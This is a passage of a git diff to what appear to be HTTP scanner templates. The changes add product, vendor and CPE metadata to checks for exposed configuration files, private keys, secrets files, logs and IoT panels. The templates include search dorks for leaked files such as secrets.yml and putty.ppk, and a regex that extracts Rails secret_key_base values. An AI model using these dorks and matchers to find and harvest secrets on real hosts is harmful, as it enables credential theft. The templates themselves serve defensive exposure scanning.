cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:-:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022043f5cb464ce98b2f50368b6a9109c466260171cae0be910601fdc522e75b260d022060013e8c4c77ccfbb8c29f2b943d0835e431e4c2bd2cf6deff507b7f7badca24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043f5cb464ce98b2f50368b6a9109c466260171cae0be910601fdc522e75b260d022060013e8c4c77ccfbb8c29f2b943d0835e431e4c2bd2cf6deff507b7f7badca24:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/pipeline-configuration.yaml b/http/exposures/files/pipeline-configuration.yaml index c68739bc65..13e5762821 100644 --- a/http/exposures/files/pipeline-configuration.yaml +++ b/http/exposures/files/pipeline-configuration.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"pipeline.yaml" + product: pipeline\\ + vendor: jenkins tags: devops,exposure,cicd,files + classification: + cpe: cpe:2.3:a:jenkins:pipeline\\:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/putty-private-key-disclosure.yaml b/http/exposures/files/putty-private-key-disclosure.yaml index bd198242b3..a544e70997 100644 --- a/http/exposures/files/putty-private-key-disclosure.yaml +++ b/http/exposures/files/putty-private-key-disclosure.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 8 github-query: filename:putty.ppk + product: putty + vendor: putty tags: exposure,files + classification: + cpe: cpe:2.3:a:putty:putty:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009743a619b8ae5bbb216de2254c978a6aff3bceeb7cc54124697d3e8b2d7b5150022068d3fcc4ef1b0bcfb6c280cd87534daf8cce9751a796c0a344d8751af50b19a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009743a619b8ae5bbb216de2254c978a6aff3bceeb7cc54124697d3e8b2d7b5150022068d3fcc4ef1b0bcfb6c280cd87534daf8cce9751a796c0a344d8751af50b19a7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/redmine-config.yaml b/http/exposures/files/redmine-config.yaml index 80dc9816f1..328fa63782 100644 --- a/http/exposures/files/redmine-config.yaml +++ b/http/exposures/files/redmine-config.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 + cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 google-query: intitle:"index of" configuration.yml + product: redmine + vendor: redmine tags: exposure,redmine,devops,edb,files http: diff --git a/http/exposures/files/redmine-settings.yaml b/http/exposures/files/redmine-settings.yaml index 5dc067b461..c0319a87b4 100644 --- a/http/exposures/files/redmine-settings.yaml +++ b/http/exposures/files/redmine-settings.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 3 google-query: intitle:"index of" "settings.yml" + product: redmine + vendor: redmine tags: misconfig,redmine,devops,files,exposure + classification: + cpe: cpe:2.3:a:redmine:redmine:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/ruby-rail-storage.yaml b/http/exposures/files/ruby-rail-storage.yaml index 42467a83a8..56f51cd5ea 100644 --- a/http/exposures/files/ruby-rail-storage.yaml +++ b/http/exposures/files/ruby-rail-storage.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 4 google-query: intitle:"index of" storage.yml + product: rails + vendor: rubyonrails tags: exposure,ruby,devops,files + classification: + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ee450f9ad85b2f4a8f1493f6bbfa9c70be1140679ac241496565825f46d6b6c022100a805eb547979651a0a9b66370195632fdb5091606fe033744e2acd93717be5a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ee450f9ad85b2f4a8f1493f6bbfa9c70be1140679ac241496565825f46d6b6c022100a805eb547979651a0a9b66370195632fdb5091606fe033744e2acd93717be5a6:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/secret-token-rb.yaml b/http/exposures/files/secret-token-rb.yaml index f9ce3c741d..b64267f36f 100644 --- a/http/exposures/files/secret-token-rb.yaml +++ b/http/exposures/files/secret-token-rb.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 3 google-query: intitle:"index of" "secret_token.rb" + product: rails + vendor: rubyonrails tags: redmine,devops,exposure,ruby,files + classification: + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025f5b925939cc1d42f8dc9b01ec2186c4e34e8e972e35116f3b9070227a351f6022100bf75273944ae4353ebd22e9fe8bfc3fa3182d098162dc13e02c7ade088516ec3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022025f5b925939cc1d42f8dc9b01ec2186c4e34e8e972e35116f3b9070227a351f6022100bf75273944ae4353ebd22e9fe8bfc3fa3182d098162dc13e02c7ade088516ec3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/secrets-file.yaml b/http/exposures/files/secrets-file.yaml index ae84d7572b..517abcd270 100644 --- a/http/exposures/files/secrets-file.yaml +++ b/http/exposures/files/secrets-file.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 4 google-query: intitle:"index of" "secrets.yml" + product: rails + vendor: rubyonrails tags: cloud,devops,files,exposure,misconfig + classification: + cpe: cpe:2.3:a:rubyonrails:rails:*:*:*:*:*:*:*:* http: - method: GET path: @@ -46,4 +50,4 @@ http: group: 1 regex: - 'secret_key_base: ([a-z0-9]+)' -# digest: 4a0a004730450221008f3c78e37d6034c88fc8a231da592e10d3f0dd3cffc406c8f8ce4b3bb86ccf7802201eb77dae641b3f6691653ae35bfe9c03af2cc9716703b1d9288c516869363fbb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008f3c78e37d6034c88fc8a231da592e10d3f0dd3cffc406c8f8ce4b3bb86ccf7802201eb77dae641b3f6691653ae35bfe9c03af2cc9716703b1d9288c516869363fbb:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/sendgrid-env.yaml b/http/exposures/files/sendgrid-env.yaml index 975009dc54..a35fcb8cc6 100644 --- a/http/exposures/files/sendgrid-env.yaml +++ b/http/exposures/files/sendgrid-env.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"sendgrid.env" + product: sendgrid + vendor: sendgrid tags: exposure,sendgrid,key,api,files + classification: + cpe: cpe:2.3:a:sendgrid:sendgrid:*:*:*:*:wordpress:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: status: - 429 negative: true -# digest: 4a0a0047304502205a88c97956ef974c3f3d8d386cf6c5821dc0b471e9fbb17a7c198d08441dd105022100d39f0631cd20d813b18f61131b18dc37002b08255ea6cb627443e72543f809c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a88c97956ef974c3f3d8d386cf6c5821dc0b471e9fbb17a7c198d08441dd105022100d39f0631cd20d813b18f61131b18dc37002b08255ea6cb627443e72543f809c6:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/svn-wc-db.yaml b/http/exposures/files/svn-wc-db.yaml index 533e11fba4..7f2813e89b 100644 --- a/http/exposures/files/svn-wc-db.yaml +++ b/http/exposures/files/svn-wc-db.yaml @@ -13,8 +13,12 @@ info: verified: true max-request: 2 google-query: intitle:"index of" "wc.db" + product: subversion + vendor: apache tags: msf,exposure,svn,config,files + classification: + cpe: cpe:2.3:a:apache:subversion:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207b3da2350ab0dfe42fea1b9232ea351923200d1ea45bd9d3ae7a0c20ab8b1a5102210094ee3f8bfe328ad9a92ca4f3473a4e14a0dfe5e9f2a598b38282b826b31c7f38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b3da2350ab0dfe42fea1b9232ea351923200d1ea45bd9d3ae7a0c20ab8b1a5102210094ee3f8bfe328ad9a92ca4f3473a4e14a0dfe5e9f2a598b38282b826b31c7f38:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/files/symfony-properties-ini.yaml b/http/exposures/files/symfony-properties-ini.yaml index 8e64ccc91e..f59b6ee2b4 100644 --- a/http/exposures/files/symfony-properties-ini.yaml +++ b/http/exposures/files/symfony-properties-ini.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 2 google-query: intitle:"index of" "properties.ini" + product: symfony + vendor: sensiolabs tags: symfony,exposure,files + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/symfony-security.yaml b/http/exposures/files/symfony-security.yaml index 2e5cb16c8e..bb59999dec 100644 --- a/http/exposures/files/symfony-security.yaml +++ b/http/exposures/files/symfony-security.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 3 google-query: intitle:"index of" "security.yml" + product: symfony + vendor: sensiolabs tags: symfony,devops,exposure,files + classification: + cpe: cpe:2.3:a:sensiolabs:symfony:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/token-info-json.yaml b/http/exposures/files/token-info-json.yaml index 9e0ebcee5f..1604b1761b 100644 --- a/http/exposures/files/token-info-json.yaml +++ b/http/exposures/files/token-info-json.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 2 google-query: intitle:"index of" "token_info.json" + product: sample_token + vendor: sample_token_project tags: exposure,files + classification: + cpe: cpe:2.3:a:sample_token_project:sample_token:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/uwsgi-ini.yaml b/http/exposures/files/uwsgi-ini.yaml index 510673961e..8956431cae 100644 --- a/http/exposures/files/uwsgi-ini.yaml +++ b/http/exposures/files/uwsgi-ini.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"uwsgi.ini" + product: uwsgi + vendor: unbit tags: exposure,uwsgi,files + classification: + cpe: cpe:2.3:a:unbit:uwsgi:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/viminfo-disclosure.yaml b/http/exposures/files/viminfo-disclosure.yaml index 946f2225ca..98e1d697ac 100644 --- a/http/exposures/files/viminfo-disclosure.yaml +++ b/http/exposures/files/viminfo-disclosure.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: html:"Viminfo" + product: vim + vendor: vim tags: devops,exposure,viminfo,config + classification: + cpe: cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/vscode-sftp.yaml b/http/exposures/files/vscode-sftp.yaml index e2a6ea9491..4a5e5b3b77 100644 --- a/http/exposures/files/vscode-sftp.yaml +++ b/http/exposures/files/vscode-sftp.yaml @@ -10,8 +10,12 @@ info: verified: true max-request: 3 shodan-query: html:"sftp.json" + product: visual_studio_code + vendor: microsoft tags: exposure,vscode,sftp,ssh,files + classification: + cpe: cpe:2.3:a:microsoft:visual_studio_code:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/webpack-mix-js.yaml b/http/exposures/files/webpack-mix-js.yaml index 9a04c6902c..663b4e6177 100644 --- a/http/exposures/files/webpack-mix-js.yaml +++ b/http/exposures/files/webpack-mix-js.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"webpack.mix.js" + product: webpack + vendor: webpack.js tags: config,exposure,devops,files + classification: + cpe: cpe:2.3:a:webpack.js:webpack:*:*:*:*:node.js:*:*:* http: - method: GET path: diff --git a/http/exposures/files/wp-cli-exposure.yaml b/http/exposures/files/wp-cli-exposure.yaml index 2eb1d50d1d..c050c6df4b 100644 --- a/http/exposures/files/wp-cli-exposure.yaml +++ b/http/exposures/files/wp-cli-exposure.yaml @@ -8,8 +8,12 @@ info: verified: true max-request: 1 shodan-query: html:"wp-cli.yml" + product: wp-cli + vendor: wp-cli tags: config,exposure,wp-cli,files + classification: + cpe: cpe:2.3:a:wp-cli:wp-cli:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/files/ws-ftp-ini.yaml b/http/exposures/files/ws-ftp-ini.yaml index 54f1c83646..f74a948ab9 100644 --- a/http/exposures/files/ws-ftp-ini.yaml +++ b/http/exposures/files/ws-ftp-ini.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 google-query: intitle:"Index of" ws_ftp.ini + product: ws_ftp + vendor: ipswitch tags: exposure,ftp,files + classification: + cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009ea31a3317446f7a301ca1361942add6d318a0542fde33aef0647ba6294de12e0221008fa0c1b2de309a3b4949698253fadf3344e74f286a907e365f9b98d9085a00b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009ea31a3317446f7a301ca1361942add6d318a0542fde33aef0647ba6294de12e0221008fa0c1b2de309a3b4949698253fadf3344e74f286a907e365f9b98d9085a00b1:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/logs/fastcgi-echo.yaml b/http/exposures/logs/fastcgi-echo.yaml index 3e41935917..2f9c53d0a0 100644 --- a/http/exposures/logs/fastcgi-echo.yaml +++ b/http/exposures/logs/fastcgi-echo.yaml @@ -14,8 +14,12 @@ info: verified: true max-request: 1 google-query: inurl:fcgi-bin/echo + product: fcgi + vendor: fastcgi tags: exposure,logs,oracle,fastcgi,edb + classification: + cpe: cpe:2.3:a:fastcgi:fcgi:*:*:*:*:*:*:*:* http: - method: GET path: diff --git a/http/exposures/logs/npm-debug-log.yaml b/http/exposures/logs/npm-debug-log.yaml index 173054504b..c47a4a7d97 100644 --- a/http/exposures/logs/npm-debug-log.yaml +++ b/http/exposures/logs/npm-debug-log.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 github-query: filename:npm-debug.log + product: npm + vendor: npmjs tags: exposure,npm,logs,debug + classification: + cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db233ec77fffd7ac6156a1aa42178960658c69f7b7a0eda7b9da2800bf56865102206694c2b9fb3e6abb338df283679eeff18e1a2dfa310960321515ba3c8c9114e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db233ec77fffd7ac6156a1aa42178960658c69f7b7a0eda7b9da2800bf56865102206694c2b9fb3e6abb338df283679eeff18e1a2dfa310960321515ba3c8c9114e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/logs/npm-log-file.yaml b/http/exposures/logs/npm-log-file.yaml index 5122b21908..b21c1f84f6 100644 --- a/http/exposures/logs/npm-log-file.yaml +++ b/http/exposures/logs/npm-log-file.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 2 shodan-query: html:"npm-debug.log" + product: npm + vendor: npmjs tags: npm,logs,exposure + classification: + cpe: cpe:2.3:a:npmjs:npm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e083212c9e6ba90039b1774aed2b95d777c39b873fd4f9ee5792e4dbce2c9fc022061be5d69ed392493f0721e1fcd850d753b9fcb490ff8c4d10aacbaa18e2e5a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205e083212c9e6ba90039b1774aed2b95d777c39b873fd4f9ee5792e4dbce2c9fc022061be5d69ed392493f0721e1fcd850d753b9fcb490ff8c4d10aacbaa18e2e5a48:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/logs/opentsdb-status.yaml b/http/exposures/logs/opentsdb-status.yaml index 3677273276..31e09ef9d5 100644 --- a/http/exposures/logs/opentsdb-status.yaml +++ b/http/exposures/logs/opentsdb-status.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:407286339 + product: opentsdb + vendor: opentsdb tags: opentsdb,exposure,logs + classification: + cpe: cpe:2.3:a:opentsdb:opentsdb:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031c2a403a51a74737f3470925b045b17c5a30261800f184d58791009f9508963022100b177396ccd83f7cfff0f44df34c527919b742ceda04ed807a9d841e9eb9e5a36:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022031c2a403a51a74737f3470925b045b17c5a30261800f184d58791009f9508963022100b177396ccd83f7cfff0f44df34c527919b742ceda04ed807a9d841e9eb9e5a36:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/logs/redis-exception-error.yaml b/http/exposures/logs/redis-exception-error.yaml index 8ed61fb42d..6592454887 100644 --- a/http/exposures/logs/redis-exception-error.yaml +++ b/http/exposures/logs/redis-exception-error.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: html:"redis.exceptions.ConnectionError" + product: redis + vendor: redis tags: exposure,redis,logs + classification: + cpe: cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +37,4 @@ http: - type: status status: - 500 -# digest: 4b0a004830460221009effb92156ed3b123be771513d8faeb337be7c992827076cd2ba1f0747c4287b022100cf7d05453966d6ce73436698e470203d6008bbab73750ed3867c58d81411848e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009effb92156ed3b123be771513d8faeb337be7c992827076cd2ba1f0747c4287b022100cf7d05453966d6ce73436698e470203d6008bbab73750ed3867c58d81411848e:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/logs/teampass-ldap.yaml b/http/exposures/logs/teampass-ldap.yaml index 0c57cb76b3..4cba6e8fb7 100644 --- a/http/exposures/logs/teampass-ldap.yaml +++ b/http/exposures/logs/teampass-ldap.yaml @@ -12,10 +12,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-200 + cpe: cpe:2.3:a:teampass:teampass:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="TEAMPASS" + product: teampass + vendor: teampass tags: exposure,teampass,ldap,logs http: @@ -42,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cc9dacf83710a499518c3ad31e93aebfd7835d781afe8c22cc9e3e791367ba57022100c3948eaaea634d939df179384273a28e60053cd005cc31545f8bd748050cffb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc9dacf83710a499518c3ad31e93aebfd7835d781afe8c22cc9e3e791367ba57022100c3948eaaea634d939df179384273a28e60053cd005cc31545f8bd748050cffb4:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/logs/ws-ftp-log.yaml b/http/exposures/logs/ws-ftp-log.yaml index 81e329b448..3dd56a4340 100644 --- a/http/exposures/logs/ws-ftp-log.yaml +++ b/http/exposures/logs/ws-ftp-log.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 2 google-query: intitle:"Index of" ws_ftp.log + product: ws_ftp + vendor: ipswitch tags: exposure,ftp,logs + classification: + cpe: cpe:2.3:a:ipswitch:ws_ftp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220613888ed65c3ff67ef372788dbe09ded04db2e31c1807d7107af61c5c1471f2202207e3ca665c1da0f5cd82f750562089d1572fb66130fcec76035dafb570a9d4741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220613888ed65c3ff67ef372788dbe09ded04db2e31c1807d7107af61c5c1471f2202207e3ca665c1da0f5cd82f750562089d1572fb66130fcec76035dafb570a9d4741:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/logs/yii-error-page.yaml b/http/exposures/logs/yii-error-page.yaml index 6e7963b0de..389925dab4 100644 --- a/http/exposures/logs/yii-error-page.yaml +++ b/http/exposures/logs/yii-error-page.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: html:"yii\base\ErrorException" + product: yii + vendor: yii_software tags: exposure,yii,logs + classification: + cpe: cpe:2.3:a:yii_software:yii:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,4 +30,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502200293be2ab6388822de79f4ed392948c53d9154ea7d778c6cedd46824bdc08d44022100b3c26629597543e1cd282a042e37552e926f089aab28451584054f8aae17806c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200293be2ab6388822de79f4ed392948c53d9154ea7d778c6cedd46824bdc08d44022100b3c26629597543e1cd282a042e37552e926f089aab28451584054f8aae17806c:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposures/tokens/jwk-json-leak.yaml b/http/exposures/tokens/jwk-json-leak.yaml index bb556e028b..97d1c4515e 100644 --- a/http/exposures/tokens/jwk-json-leak.yaml +++ b/http/exposures/tokens/jwk-json-leak.yaml @@ -12,8 +12,12 @@ info: shodan-query: html:"jwks.json" verified: true max-request: 1 + product: jwt + vendor: jwt_project tags: exposure,token,generic + classification: + cpe: cpe:2.3:a:jwt_project:jwt:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205581eae6281f5e413965da3fe0031dbb6908676617f08fd0b19396c86046281702210081886f398e6973d5894cf43b439d3825e0e036150c7a2355bab22714bf4c960d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205581eae6281f5e413965da3fe0031dbb6908676617f08fd0b19396c86046281702210081886f398e6973d5894cf43b439d3825e0e036150c7a2355bab22714bf4c960d:922c64590222798bb761d5b6d8e72950 diff --git a/http/iot/automation-direct.yaml b/http/iot/automation-direct.yaml index b0940e9f73..92f3ee8709 100644 --- a/http/iot/automation-direct.yaml +++ b/http/iot/automation-direct.yaml @@ -11,10 +11,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:h:automationdirect:ea9-t6cl:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"C-more -- the best HMI presented by AutomationDirect" google-query: intitle:"C-more -- the best HMI presented by AutomationDirect" + product: ea9-t6cl + vendor: automationdirect tags: panel,iot,edb http: diff --git a/http/iot/grandstream-device-configuration.yaml b/http/iot/grandstream-device-configuration.yaml index 6a02ad33e7..d090cc093c 100644 --- a/http/iot/grandstream-device-configuration.yaml +++ b/http/iot/grandstream-device-configuration.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: http.title:"Grandstream Device Configuration" + product: ht801_firmware + vendor: grandstream tags: iot + classification: + cpe: cpe:2.3:o:grandstream:ht801_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c1185f8d776754c9a70431024fd52aa8d0eda89e1add045809bcc28ca4a673c0022100c3c467a3ce2d09fc8fec4b3b803dc3b69a656094debd6fc13f7dd48612f8dc69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1185f8d776754c9a70431024fd52aa8d0eda89e1add045809bcc28ca4a673c0022100c3c467a3ce2d09fc8fec4b3b803dc3b69a656094debd6fc13f7dd48612f8dc69:922c64590222798bb761d5b6d8e72950 diff --git a/http/iot/honeywell-building-control.yaml b/http/iot/honeywell-building-control.yaml index 72b76e1068..8b471a982a 100644 --- a/http/iot/honeywell-building-control.yaml +++ b/http/iot/honeywell-building-control.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: html:"Honeywell Building Control" + product: alerton_ascent_control_module + vendor: honeywell tags: panel,iot + classification: + cpe: cpe:2.3:h:honeywell:alerton_ascent_control_module:*:*:*:*:*:*:*:* http: - method: GET path: @@ -24,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a83eac085f1d018323994ca14922711cde37cd4d7f1a5c36a7e2fae8813cfa49022028a03cc74e28741faa1e9761f3540241c58eb11189cb9d2f5fc5743ac187416c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a83eac085f1d018323994ca14922711cde37cd4d7f1a5c36a7e2fae8813cfa49022028a03cc74e28741faa1e9761f3540241c58eb11189cb9d2f5fc5743ac187416c:922c64590222798bb761d5b6d8e72950 diff --git a/http/iot/hp-color-laserjet-detect.yaml b/http/iot/hp-color-laserjet-detect.yaml index 23ac17eabd..e71f28ba1e 100644 --- a/http/iot/hp-color-laserjet-detect.yaml +++ b/http/iot/hp-color-laserjet-detect.yaml @@ -13,8 +13,12 @@ info: max-request: 2 shodan-query: http.title:"HP Color LaserJet" google-query: intitle:"HP Color LaserJet" + product: color_laserjet_pro_mfp_m183_7kw56a + vendor: hp tags: iot,hp + classification: + cpe: cpe:2.3:h:hp:color_laserjet_pro_mfp_m183_7kw56a:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +49,4 @@ http: group: 1 regex: - '

HP Color LaserJet (.+)<\/h1><\/td>' -# digest: 490a0046304402200f946e9f26ce87e308fed44cf7b4ca6ec77672785bdb1610157e7a12ae75118d02202b5461ac88cd30c05cd94068eae230b5342938dfc2d64723c21510a874287ce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200f946e9f26ce87e308fed44cf7b4ca6ec77672785bdb1610157e7a12ae75118d02202b5461ac88cd30c05cd94068eae230b5342938dfc2d64723c21510a874287ce9:922c64590222798bb761d5b6d8e72950 diff --git a/http/iot/hue-personal-wireless-panel.yaml b/http/iot/hue-personal-wireless-panel.yaml index 6ad184ca79..428132b177 100644 --- a/http/iot/hue-personal-wireless-panel.yaml +++ b/http/iot/hue-personal-wireless-panel.yaml @@ -8,8 +8,12 @@ info: metadata: max-request: 1 shodan-query: title:"hue personal wireless lighting" + product: hue + vendor: philips tags: hue,iot,wireless + classification: + cpe: cpe:2.3:h:philips:hue:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ce99a330b051d9b5422b795b8aebf4e359f23b0d128e3291dff6647d18a31ce022100cb28be55fdb18f472419448524da9b7ac273a47bfb378d9a9b2703d2c261e59c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200ce99a330b051d9b5422b795b8aebf4e359f23b0d128e3291dff6647d18a31ce022100cb28be55fdb18f472419448524da9b7ac273a47bfb378d9a9b2703d2c261e59c:922c64590222798bb761d5b6d8e72950 diff --git a/http/iot/loytec-device.yaml b/http/iot/loytec-device.yaml index 74658391af..a5d061a20c 100644 --- a/http/iot/loytec-device.yaml +++ b/http/iot/loytec-device.yaml @@ -9,8 +9,12 @@ info: verified: true max-request: 1 shodan-query: "loytec" + product: lvis-3me + vendor: loytec tags: iot,loytec + classification: + cpe: cpe:2.3:h:loytec:lvis-3me:*:*:*:*:*:*:*:* http: - method: GET path: @@ -27,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e3d2aed4c3c31c558f094ead6ee0e120da77d623f7951bca70c1e48fc4539e81022100abaaceec70b5e2dc59b778526a16d89eae8661ffe48a96a846279bb83edb62f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3d2aed4c3c31c558f094ead6ee0e120da77d623f7951bca70c1e48fc4539e81022100abaaceec70b5e2dc59b778526a16d89eae8661ffe48a96a846279bb83edb62f8:922c64590222798bb761d5b6d8e72950 diff --git a/http/iot/octoprint-3dprinter-detect.yaml b/http/iot/octoprint-3dprinter-detect.yaml index 5662a496e8..5130a70599 100644 --- a/http/iot/octoprint-3dprinter-detect.yaml +++ b/http/iot/octoprint-3dprinter-detect.yaml @@ -9,11 +9,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:octoprint:octoprint:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: - http.favicon.hash:1307375944 - http.title:"OctoPrint" + product: octoprint + vendor: octoprint tags: iot,octoprint,panel http: diff --git a/http/iot/zebra-printer-detect.yaml b/http/iot/zebra-printer-detect.yaml index 620b68d6af..745b872c91 100644 --- a/http/iot/zebra-printer-detect.yaml +++ b/http/iot/zebra-printer-detect.yaml @@ -11,8 +11,12 @@ info: verified: true max-request: 1 shodan-query: html:"Zebra Technologies" + product: zt220_firmware + vendor: zebra tags: iot,zebra,printer + classification: + cpe: cpe:2.3:o:zebra:zt220_firmware:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206b4bee6bb842af88daf29023d61c1696dd19f32c479e516ca00dad284abbe97a022100eaff461770fad8ee9f38e10b6cf918a85b5e58312662167fb57205f713ecbfcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 